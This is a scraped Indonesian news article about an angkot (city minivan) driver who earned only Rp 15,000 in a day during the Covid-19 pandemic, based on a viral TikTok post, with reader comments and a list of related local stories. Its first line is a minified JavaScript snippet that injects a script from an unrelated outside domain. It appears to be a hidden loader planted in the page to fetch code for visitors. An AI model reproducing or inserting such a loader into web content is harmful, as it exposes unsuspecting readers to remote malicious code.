(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
WARGA +62

Curhatan Sopir Angkot di Tengah Pandemi, Bekerja Sejak Subuh Hanya Dapat Rp 15 Ribu


KANALKALIMANTAN.COM – Tidak sedikit masyarakat yang mengalami kesulitan dalam mencari nafkah di tengah pandemi Covid-19. Hal itu juga dirasakan seorang sopir angkot (Angkutan Kota), yang merasa kesulitan mencari penumpang.

Dalam video yang diunggah oleh akun TikTok @makeup_bynha beberapa waktu lalu, pemilik akun bercerita pengalamannya saat naik angkot dan curhatan pilu sopir angkot tersebut.

Ia mengaku naik kendaraan umum tersebut dari Lippo Cikarang dengan tujuan Lemahabang.

Sepanjang perjalanan, pemilik akun menyadari tidak ada satu pun penumpang lain yang menaiki angkot tersebut dan di dalam angkot hanya ada dirinya bersama sopir.

 

 

Baca juga: Laporan di Polda Metro Jaya Ditolak, Pengacara Terlapor Pelecehan KPI Bilang Begini

Saat berhenti untuk mengisi bensin, pemilik akun juga memperhatikan bahwa sang sopir hanya membeli bensin seharga Rp 12.000.

Penasaran, ia pun bertanya mengenai kondisi penumpang akhir-akhir ini.

Curhatan sopir angkot sepi. [TikTok]

Dari sana, sopir angkot tersebut bercerita bahwa jumlah penumpang saat ini sangat sedikit. Sepinya penumpang angkot yang naik membuatnya sulit mendapat nafkah.

Bahkan, sopir angkot itu mengaku telah bekerja sejak subuh dan hanya mendapat Rp 15.000. Itupun tersisa Rp 3.000 setelah ia belikan bensin.

“Saking sepinya si sopir pas isi bensin cuma 12 ribu. Pas aku tanya ‘sepi ya pak sekarang nariknya’, dengan tarikan nafas yang berat si pak sopir jawab ‘bukan sepi lagi neng, ini dari subuh narik cuma baru dapet 15 ribu. Abis isi bensin sisa 3 ribu. Alhamdulillah ada buat beli minum’. Ya Allah sehat-sehat ya pak, semoga rezeki bapak lancar selalu,” tulis pemilik akun dalam keterangan pada videonya.

Unggahan yang telah dilihat sebanyak lebih dari 969.300 penayangan dan disukai sebanyak lebih dari 66.700 kali oleh sesama pengguna TikTok itu pun menuai beragam komentar.

Baca juga: Berlaku Sistem Ganjil Genap, Satlantas Polres Cianjur Pulangkan 340 Unit Kendaraan

Tak sedikit warganet yang merasa simpati pada kondisi sopir angkot tersebut dan menyalurkan sedikit donasi untuk diberikan kepada sopir angkot.

“Open donasi buat sopir dan kenek yang benar-benar tak dapat penumpang (sepi). Sembako kayaknya lumayan buat mereka,” tulis akun @28riyadi1.

“Aku kalau naik angkot sepi, nggak ada penumpang naik, suka nggak tega. Aku suka ngasih lebih. Inget bapaknya pasti punya anak-anak istri di rumah,” komentar @senja.kuapik.

“Bapak saya sopir angkot dan saya juga kadang gantian nyupir angkot. Selama ini juga keadaannya sama seperti ini, sepi banget,” ungkap @iqbalilhamni.

Curhatan sopir angkot sepi. [TikTok]

“Plis gue nangis banget liatnya. Btw bapak gue juga sama sopir angkot, kadang yang biasanya bawa uang 50 ribu sampai 100 ribu sekarang malah bawa 20 ribu sampai 50 ribu. Sehat-sehat bapak,” tambah @hahahihihatihancur.(Suara.com)

Editor: suara


Risa

Recent Posts

Berbaur dengan Masyarakat, Bupati dan Wabup Banjar Nobar Indonesia Vs Uzbekistan

KANALKALIMANTAN.COM, MARTAPURA - Alun-alun Ratu Zalecha, Martapura dipilih menjadi tempat nonton bareng (nobar) Semi Final… Read More

39 menit ago

Diakhiri Nobar Timnas, Pj Bupati Kapuas Menutup Expo Kapuas 2024

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas Erlin Hardi secara resmi menutup gelaran Expo… Read More

3 jam ago

Bingkisan Kebahagiaan PLN untuk Warga Kalsel yang Membutuhkan

KANALKALIMANTAN.COM, BANJARBARU - PT PLN (Persero) Unit Induk Penyaluran dan Pusat Pengatur (UIP3B) Kalimantan melalui… Read More

3 jam ago

Asa Warga Banjarmasin Timnas Indonesia Masuk Olimpiade Paris 2024

KANALKALIMANTAN.COM, BANJARMASIN - Nonton bareng (Nobar) laga semifinal AFC U-23 Indonesia vs Uzbekistan di halaman… Read More

4 jam ago

Ini Tiga Rekor Muri Sebagai Kado HUT ke-73 Kabupaten Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS – Tiga rekor Museum Rekor Indonesia (Muri) menjadi catatan kado Hari Jadi… Read More

4 jam ago

Ritual Laluhan dan Ngarunya Lengkapi Perayaan HUT ke-73 Kabupaten Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Momen perayaan Hari Jadi ke-218 Kota Kuala Kapuas dan Hari Ulang… Read More

4 jam ago

This website uses cookies.